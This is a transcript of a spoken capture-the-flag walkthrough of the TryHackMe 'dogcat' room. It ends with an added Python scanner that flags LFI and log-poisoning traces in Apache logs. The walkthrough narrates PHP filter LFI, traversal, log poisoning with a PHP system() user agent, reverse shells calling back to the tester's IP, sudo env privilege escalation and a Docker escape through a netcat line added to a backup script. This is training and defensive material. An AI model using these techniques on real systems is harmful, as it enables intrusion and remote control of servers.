Hello everyone, my name is John Hammond and this is another TryHackMe video. Today I want to be showcasing the dogcat room that came out just a few days ago, right? I think it was actually like April 17th, and the time of recording is April 22nd, so we'll see how we do. It looks like we have to join this room. I've got it up here on my screen, and I believe this is a free room, so we can access it totally just fine. I'm connected with my John Hammond YouTube account, that is free. And I guess I should clear out some of the stuff from my other video, my bad. Trying to knock a few out today and trying to get back to it.

So let's make a directory dogcat and let's hide over there. Let's sort out our README files. We've got some notes that we can keep track of, and I'll call this dogcat. The IP address I just like to keep track of as a little environment variable, or just a variable I could use and reuse pretty easily. So let's go ahead and do this. It says: I made a website for viewing cat and dog images with PHP. If you're feeling down, come look at dogs and cats. The machine may take a few minutes to fully start up. Okay, so not a whole lot of answers or guided, I guess, walkthrough here. It's more of a challenge room. It says: What's flag one? What's flag two? What's flag three? What's flag four? So we are just off to the races, kind of on our own.

So let's do our own thing. Let's, uh, let's go see if this machine is up. I guess I'll ping this guy. Let's export this guy, that, and then let's ping our IP address. Good. Is he up and available? He is. Okay, dogcat, a gallery of various dogs or cats. What would you like to see? I'd like to see a dog, please. Oh, this is wonderful. How many dogs does it have? Oh my gosh, this is the real YouTube content you guys came for. Have we got any cute cats? My girlfriend and I are gonna get a dog. That's a ginormous image. Holy cat, I don't want that. That's not a dog, that's just white space.
We want to, we want to get a shell, but, you know. Okay, let's go find out what's really going on here. If I look at the URL, we've got view=dog, which is kind of peculiar, because maybe we could view some interesting things. The view looks to be a variable which seems to be being set to kind of our option here, if I set it to a dog or a cat. Maybe we could view, maybe, the home page, like index. Only dogs or cats are allowed. That's annoying. cat, dog, those work. What about... I guess I can't, like, you can't do some local file inclusion all the way up to /etc/passwd in this case, because I think it's probably adding a .php extension on here.

So what this is doing though, if it is adding a PHP extension, well, we could abuse some of the PHP local file inclusion tricks and techniques, where we can say PHP LFI filter, because we could supply a filter for what we might be looking for, and that way we won't have it interpret the actual PHP tags. We could perhaps include any resource that we really, really wanted to and encode it with base64, so that way, once it's encoded in base64, we won't see the real PHP tags being interpreted and evaluated by the server. We'll see them as text that we can go ahead and manipulate and access.

So let's just steal the syntax. I always go to this resource; I always have to Google to find it. PayloadsAllTheThings has it just as well, but I always end up looking for that idontplaydarts.com application security site. So let's try to view that syntax for php://filter/convert.base64-encode, and I probably should have got the rest of it there. I need to specify a resource, yeah, resource= and then what we want to actually see. So resource, let's try it for dog, and looks like we have some base64 encoded.
So that would work for us. Let's go ahead and echo that base64 string into our base64 decoder, and it says image source dogs and a random... Okay, it looks like there are 10 images and they're all JPEGs. Interesting. Let's see if we could actually access that index.php now. Only cats or dogs are allowed. Can I... does dog have to be included in that? How does that work? Maybe if we ask for dog but we also went to a parent directory, so we were to move up, could we still access index? Oh yeah, yeah, yeah, yeah, okay. So index.php now has all of that. So let's try and echo that into base64 -d. Cool. Okay, so now we have the PHP source code. Let's redirect this to an index.php. Let's go ahead and subl all that so we can see it with real highlighting.

View cat or dog, just as we saw, and it has to contain the string dog or cat, it returns string position. And it gets, oh, and it also includes the extension: if the extension is set with a GET variable, oh, we can control that, it will use that; otherwise it will specify .php. Oh, okay, so we could access a lot here, because if we can control the extension and it's not going to add anything else, maybe we could verify anything, we could read out anything that we particularly wanted to. Let's try that. We could... it needs to have dog in the string, right? An extension could be anything. It will include it, so without using our filter, now that we've got the source code of the page, maybe we could include dog/../../../../../etc/passwd, and let's actually use the ampersand to specify &ext= should be nothing. And there we go. Now.
We've looked at /etc/passwd, so we could potentially leak out any files that we wanted to. Maybe, because we have local file inclusion, maybe we could access the log file of this web server and see if it's seeing our requests or what headers are included, because maybe we could actually get our own PHP code executed. We want to elevate what we have from our local file inclusion exploit, or this vulnerability, and leverage it to remote code execution so we could do some more dangerous stuff, maybe get control of the box.

So where would that be? /var/apache/access.log? Nope, okay, that's not it. Is it httpd? Now we have to try and determine where we're actually seeing our logs. Apache log files: /var/log/httpd/access.log, access_log, /var/log... probably need access.log. Nope. apache2? Oh, okay, there we go: /var/log/apache2/access.log. Now we have a lot of results. We can actually see all of our attempts here, so view=dog, etc., etc., etc., and it includes our user agent. My face is in the way. So you can see that here with any of these actual user agents that I'm supplying, is that it is keeping track of the syntax. And if we were to specify our user agent, maybe we'd be able to actually specify our user agent of PHP code that we would want to execute. If we were to load this page, maybe it'll actually go ahead and execute that for us. Let's try that. I'm gonna actually do that in curl. I'm gonna have a separate request so I can kind of make that smart for me. I'll go to this page, just getting the URL itself.
I will include my user agent as a header for curl with the -H argument, and we're gonna include PHP syntax in here. So it's gonna be <?php, right, because it's the opening PHP tag, and then we'll run the system command, and we're gonna end up doing this with an argument that can be passed to the web server. So I'll use that HTTP GET variable. The way we can access that is with a PHP variable, but the PHP variable is prefixed with the dollar sign, the same one that bash uses. So if we're using a double quote here, we need to go ahead and escape that string with the backslash, so that way it'll be able to say User-Agent equals PHP system backslash dollar sign, and I'll use GET with the underscore here, and I'll specify c as the name of my string, the argument that I want to use. I'll close the parentheses to the system call, and then I'll close the PHP tags and end my double-quoted string.

So now when I go ahead and run this it should return just the page here, just the index that we were requesting, the home page. But we should have placed this user agent into the actual Apache access logs that we were able to see with our local file inclusion. So because that can read those PHP tags, it'll execute PHP, and it'll potentially allow us some command execution. So if I go back to my web browser, we should be able to see this. I'll go ahead and refresh the page, and looks like we have a lot of curl requests. Okay, peculiar, and system says it cannot execute a blank command.
That's good, because we haven't actually supplied that c variable whatsoever. So, you might notice I had to clean up this page. I reset the machine a lot; my IP address is different, because I broke it, because when I was trying to get the syntax right PHP would whine, it would get an error. And then once you get an error with this kind of avenue, this route that we're taking, this attack vector, once you bork the access log, if you have a PHP error, it won't return to you whatsoever, and well, now you've completely screwed yourself out of this potential attack vector, because you can't get any more PHP in that code, because every time you try and read this file, it's gonna break. So that's the potential danger and risk in doing this technique.

But now we finally got it right. system is going to be able to execute some commands if we were to supply a c value. So I'll try and go ahead and supply, as an HTTP variable, I'll use my ampersand here, &c=id, and now we can actually see the output here. We have www-data, www-data, etc., etc., etc. So now we have code execution. We've leveraged our local file inclusion to remote code execution.

So let's see if we can take this technique and go ahead and get a shell. So what I'm gonna do is I'm going to start a little netcat listener. I'll use nc -lnvp 9999, just quad 9 should work for us, and let me just kind of verify that I can get to it. I'll go ahead and check my IP address on tun0. I am 10.8.9.12. I'll just steal that out here, and I'll see if I can run that command, 9999, and looks like it didn't go through to me. Do I have the netcat command available? We don't really know, so other options we could try are using the bash technique. We could try using Python as our reverse shell. So let's go ahead and go down some of those routes. Let's go to the PentestMonkey reverse shell cheat sheet. Let's grab a Python one, and just syntax-wise, let's see if we can actually get output from Python.
I'll use python -c, I will do print Hello, or just a lot of a's actually. So we'll see if we have that output. Seemingly not. We can try that with Python 3. Still nothing, so no output from them. I guess we don't have that. We could try bash -c echo a, so maybe we'll be able to execute bash. Looks like we can in that regard. So we could try that bash reverse shell, just to try it, just to see. We might not actually get anywhere with that, but I think it's worth a try, because Python didn't seem to work out for us.

So let's go ahead and modify this string, and I do want that IP address 10.8.9.12, and we're listening on 9999. So let's go grab this string. Try to see if we can actually execute that, maybe not through the browser, but hey, we'll give it a go. Looks like that failed, didn't go to our reverse shell. We could try this with curl. We could try with requests, just to kind of check all of our dots. I'll try that because, uh, this is kind of new. I haven't particularly done this room just yet, so forgive me for kind of wading in the dark.

Let's go ahead and access this page. I don't need all that syntax here, but I do want to go ahead and specify these as arguments. So we just want to get that URL, and we'll say params, because we'll pass these all as GET variables with a URL in requests. So view can go ahead and equal that, ext can equal nothing, because we're supplying our own extension, and let's just say c can go ahead and equal our shell command. Let's see if that will work for us. So we do need requests to be able to do this in Python. I will import requests and I'll do r = requests.get on the homepage with our params equal to the params. I'll try and run this. Seemed like it came through, and no shell.
Okay, so I don't have a reverse shell just yet. What we could try and do is leverage this out to maybe stage our own PHP reverse shell. We could go ahead and simply echo a, and just a test, and make sure we can write and read things. Let's just call a little test file. Let's try to run this, and now if I go ahead and access this log file, let's change that command to actually cat out test. Okay, now we have that a variable there. So we could potentially build our own PHP shell with maybe some base64, repeatedly adding things.

So let's try, let's get a PHP reverse shell. I think I still have mine, I think I still have a copy, /opt/php-reverse-shell. Yep, let's just call this shell.php in our current directory. So let's modify this so we have our own IP address, 10.8.9.112, is that right? I think that's me. I hate when I repeatedly forget these, but it happens to me all the time. 112, and let's go to port 9999. So let's go through every single line in here. Let's actually clear these comments out, because I don't care about them all that much, and let's actually echo each of these and start to build them into our script. So let's build it out onto the file system. I'll show you what I mean.

Let's go ahead and kind of modify, make these go away so we can verify we can read our own shell. So let's do with open('shell.php') as a handle. Let's do handle.readlines(), um, and let's just say, let's grab base64 in here so we can go ahead and base64 encode some of these things. Let's say lines can equal readlines, and let's actually strip out all the newlines, so [x.strip() for x in our handle.readlines()]. And now let's actually base64 encode these. So let's do that just in the while loop so we can go ahead and print the lines that we have all as an array. bx is not defined. Oh, sorry, yep, I don't need that b in there. Looks like we have all of our lines as an array, or a list. So that's good.
Let's try to change this so that we can base64.b64encode each of these, and now they're all base64 lines. So that works well for us. So now what we can do is we can actually make these arguments real for us, and for line in all these base64 encoded lines, let's specify the parameters can actually equal echo the line. I'll use a percent here, actually I'll just use format, because I think Python 2 has that format, right? Sublime Text is set up with Python 2 right now, so I know you'll hate me for using Python 2, but that's just where we are. base64 line into, and let's add it into revshell.php, and let's include that, so we do that repeatedly, repeatedly, repeatedly. So we could build our shell, and then after that's built, let's go ahead and... we should verify what directory we're in before we go through with this. Okay, we are in our /var/www/html. So when we create a file with the .php extension in the current directory, it will go ahead and add it and make it publicly accessible for us, so we can reach our reverse shell and pull that back.

So now after that let's go ahead and base64 -d revshell.php, because that's the file name that we've created, and let's redirect that to shell.php. So now we are adding every single line into a revshell.php file, that we originally base64 decoded, then we'll go ahead and base64 decode that shell, so we have a shell.php, which is the raw PHP file. If we go ahead and request that, eventually we should be able to go ahead and see... okay, if we echo or ls that shell.php, it should exist for us just by simply running our script, and we'll have our reverse shell. Let's try it. Sending a ton of requests to the web server, building out our revshell.php file, renaming that, or at least base64 decoding it. So eventually we do have shell.php. None of these... are they being executed?
Yes, they are, because we're requesting that page. Just trying to think in my head, like, is this a valid technique? Will this work for us to get our reverse shell? Taking a little bit of time. I don't know how long it'll take, so we'll pause. Okay, he finished in just under an hour. So if we go back to our page, let's ls shell.php, which does seem to exist. If we were to verify that our netcat is still running, what we could do is we could go to shell.php, and "Call to undefined function set_time_limit" on that guy. So our set_time_limit must not have worked. Are we missing a newline there? Maybe that's the immediate function that is failing. So I guess that doesn't work well for us. If I echo nothing to base64 decode, does it work? Yeah, okay. Maybe we could change this up and base64 decode it as we're developing the script. So let's rm revshell. Go back to our command to remove revshell.php. Now if I ls, okay, I have shell.php, which we know is broken, and revshell, which we'll need to add. So let's go ahead and build this all out, base64 decoding that output and adding it in as needed. Let's wait again.

Okay, another one that took just a minute, um, our revshell should be created, so we should have revshell.php. There it is. Let's verify that revshell. Let's just cat it out. And that is also removing our whitespace. Why does it do that? It's not adding a newline. We could try to echo an empty line into revshell.php. Let's try that. Okay, now that we've added a newline, let's go see if we can actually see that in our revshell.php. Seemingly no newlines. Let's try and run it regardless. Let's go to revshell.php, and that's loading and failing on line 95. Okay. Okay, let's try another avenue. Do we have wget? wget -h, no. curl? curl -h, oh, looks like we have curl. Okay, maybe that will work.
Let's spin up a server, python -m http.server, good, and then let's go ahead and rm shell.php if we still have it, and let's download our... curl to... what is curl to download to a file? I think it's just -o. -o, yep, okay. So curl http://10.8.9.112:8000/shell.php, and let's redirect that to, or output it, sorry, with -o shell.php. So looks like, okay, it retrieved it, and now we should have a shell.php that we should be able to access. That looks like it connected. Okay, excellent. Finally, we have a shell.

Let me, uh, stabilize the shell. Do we have python -c? I don't know why I chose ls to work. We don't have Python. Do we have python3? python3 is also not found. Okay, so I guess we don't particularly need to stabilize the shell. I guess we'll be working... clearly export TERM=xterm. Now if I clear, okay, he's good. Let's see what we got now. We're moving around the file system. We were in /var/www/html, and when I saw the output earlier, I saw a flag.php, so let's just cat that out. Okay, there's our first flag. We can go ahead and submit that.

And now let's go navigate around the file system. Do we have netcat? We don't have netcat, huh. Well, let's just cat flag 2, um, that has that strange name, so let's cat that out. LFI to RCE, yes, thank you, we did that eventually. I don't know why we... What's flag three? So let's try to privesc. We don't have netcat. We know we have curl, so we could download a little LinPEAS. Let's, um, let's move or copy our /opt/linpeas into this directory, and let's move into /dev/shm. Can I run bash? Uh, that was a stupid idea. Oh, I am in /dev/shm, so I'm just fine. I guess now I just no longer have a prompt because I ran bash, stupid me. If I exit bash, okay, good, I'm back in my thing. Now that we have, uh, /dev/shm and we've got LinPEAS over in our web server, let's go ahead and curl that, so http://10.8.9.112:8000, and it's linpeas.sh.
So I'll save that as linpeas.sh. Taking its sweet time. Looks like he's got it. So let's mark that as executable, and now let's run linpeas.sh, and we'll tee that to linlog just so we have a log copy of it, and I cannot... why can I not execute that? I made it executable. That's weird to me. cat linpeas. Is that not all of it? Okay, I guess we'll do some manual enumeration. What can I run as sudo? Ah, uh, env. What does that let me do? Oh, it just displays everything. Can I GTFOBins that? GTFOBins GitHub, env, oh, you just pass it as an argument. So sudo, okay, let's sudo that again, and let's /bin/bash to get regular bash, and now I'm root. I probably didn't need to do root or bash so I would not have a shell. Let's just do /bin/sh so I have my prompt back. Or I just don't have my prompt whatsoever. That's totally fine.

Let's go check out the root directory, and there is flag three. So let's cat that out. Different environments. What is that referring to? Is this... uh, we are in the Docker environment. Okay, so when it's a different environment, I was kind of curious, did it put us in a Docker container? And I guess we are in a Docker container. So that doesn't particularly help. Um, I guess we can look around and see what else might be odd without using LinPEAS. Maybe LinEnum would work, or whatever the case may be. Oh, /opt has something called backups. ls backups: backup.sh, backup.tar. Do we have that as a crontab? crontab -l. Oh, we're in a Docker container, so we probably can't see that. Um, tar xzvf backup.tar. Oh, okay, so it's storing the entire container. Oh, and it is... checking out that backup script, so it might be running that. I might be doing that. What is backup.sh? cat backup.sh. Looks like it is tarring something from outside of the container. Okay, awesome, and that container must be the mount to kind of share that we're in.
So what we could do is add some other netcat or reverse shell syntax, or maybe bash, or whichever one might work. Let's try with netcat. Let's get this guy to see if we can break out of this container. Um, let me nc -lnvp 8888, and let's modify this to now bring me to 10.8.9.112, quad 8, and maybe if that is actually being ran, we could get some stuff. There's no super special characters in there, so let's add that to backup.sh. Okay, what is that root? Oh no, that's the directory that was just made when I untarred it. So how does backup.sh look right now? Now it tars everything and has a netcat command to call back to me. That better be the right IP address. It is. Okay, so I guess I'll wait a few minutes and see if I get a shell back. Kind of driving blind here. We could try the bash technique as well, like if that command fails, then... oh, oh, oh, oh, it worked. Okay. So now we're in the real file system, and we have flag.txt. Nice, nice. Okay, cool. Wow, that took more than it needed to to get that done, but okay, that was dogcat. So, finally did it, right?

So a little bit of recap, right? We found the web page that was seemingly doing some file inclusion to be able to read a dog or a cat, and we could abuse that. It was limiting our file extension, that we didn't know admittedly at first, but once we found that, okay, we could do some local file inclusion with the php://filter technique. That way we could read the source code of the pages, and we could see that we could specify a file extension. If we didn't use the file extension and we left it empty, so we could supply our own in the file name, then we would have any actual, like, local file inclusion that we wanted to, not just strictly limited to PHP files. So we could pull /etc/passwd, so we could see the access log for Apache in the web server, and that was the gold mine, because then we were able to actually inject some PHP code in and get remote code execution, because PHP will execute, and it's server side, so PHP would
allow us to put some commands in and run our own commands. And we tried some techniques; I was bumping around trying to, okay, pull in a reverse shell, maybe echo one with stupid echo base64 techniques, and then eventually we just curled one down and were able to pull one down off of our own website that we hosted, so that was kind of neat. And then, now that we had the reverse shell, we tried to pull some other things in, to get LinPEAS, some manual enumeration working or automated enumeration working, and that didn't work, so we opted for our manual enumeration. We could see that the www-data user, or the user that we were running currently, was able to run the env command, or the environment command, as root with sudo. So we were able to use GTFOBins to see that as a privesc. We could just simply fire up a root shell, and then we could escalate. Problem is, we were still trapped inside of a Docker container. So we saw, and we found, we discovered that backups directory that was pulling some information in and out and running it manually on the host, and that was fantastic, because that gave us a route to get out of the Docker container and actually get command execution on the real machine, on the host itself. And that is what that backup.sh allowed us to do. Eventually it called back. Maybe that's running with a cron job or some scheduled task, but with that we could find the fourth flag, and we had root on the actual computer itself.

So, holy crap, long video, a lot of mistakes, a lot of learning. I hope you guys enjoyed this video. If you did, like button, comment button, subscribe button, you know the drill. Thank you guys, thank you so much for watching. I'll see you in the next one. Take care.
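An added, defender-side example, not code from the video or from the dogcat room: this Python scanner reads Apache combined-format access-log lines (the same file the video reads back through the LFI) and flags the indicators the walkthrough leaves behind, php://filter wrappers in view=, ../ traversal, an empty ext= parameter, sensitive paths, and PHP open tags in the User-Agent that set up log poisoning. The sample log lines, client IP, timestamps and sizes are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" log format, the layout of /var/log/apache2/access.log.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A PHP open tag landing in a logged header is the log-poisoning precondition.
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)
SENSITIVE_PATHS = ("/etc/", "/var/log/", "/proc/")


def analyse_line(line):
    """Return the list of findings for one access-log line (empty if it looks clean)."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return ["unparsable line"]
    findings = []
    # parse_qs URL-decodes values, so %2e%2e/ style encoding is caught as well.
    query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
    view = query.get("view", [""])[0]
    if "php://" in view.lower():
        findings.append("php wrapper in view= (source disclosure via php://filter)")
    if "../" in view or "..\\" in view:
        findings.append("directory traversal in view=")
    if "ext" in query and query["ext"][0] == "":
        findings.append("empty ext= (extension check bypassed)")
    if any(p in view for p in SENSITIVE_PATHS):
        findings.append("sensitive path requested via view=")
    if PHP_TAG_RE.search(m.group("ua")) or PHP_TAG_RE.search(m.group("referer")):
        findings.append("PHP open tag in User-Agent/Referer (log poisoning)")
    return findings


def scan(log_text):
    """Scan a whole log; return (line number, client ip, findings) for suspicious lines."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        if not line.strip():
            continue
        findings = analyse_line(line)
        if findings:
            hits.append((n, line.split(" ", 1)[0], findings))
    return hits


# Constructed sample lines mirroring the requests made in the walkthrough; the
# client IP, timestamps and response sizes are made up.
SAMPLE_LOG = """\
10.8.9.12 - - [22/Apr/2020:14:01:02 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.8.9.12 - - [22/Apr/2020:14:02:10 +0000] "GET /?view=php://filter/convert.base64-encode/resource=dog/../index HTTP/1.1" 200 1810 "-" "Mozilla/5.0"
10.8.9.12 - - [22/Apr/2020:14:03:30 +0000] "GET /?view=dog/../../../../etc/passwd&ext= HTTP/1.1" 200 1400 "-" "Mozilla/5.0"
10.8.9.12 - - [22/Apr/2020:14:05:45 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "<?php system($_GET['c']); ?>"
10.8.9.12 - - [22/Apr/2020:14:06:01 +0000] "GET /?view=dog/../../../../var/log/apache2/access.log&ext=&c=id HTTP/1.1" 200 90000 "-" "curl/7.68.0"
"""

if __name__ == "__main__":
    for n, ip, findings in scan(SAMPLE_LOG):
        print(f"line {n} from {ip}:")
        for f in findings:
            print(f"  - {f}")
```

Pointing scan() at a real access.log also surfaces the failure mode the video hit: once a poisoned header is in the file, every later include of the log re-executes it, so the poisoned line is the one to preserve for forensics before the log is rotated.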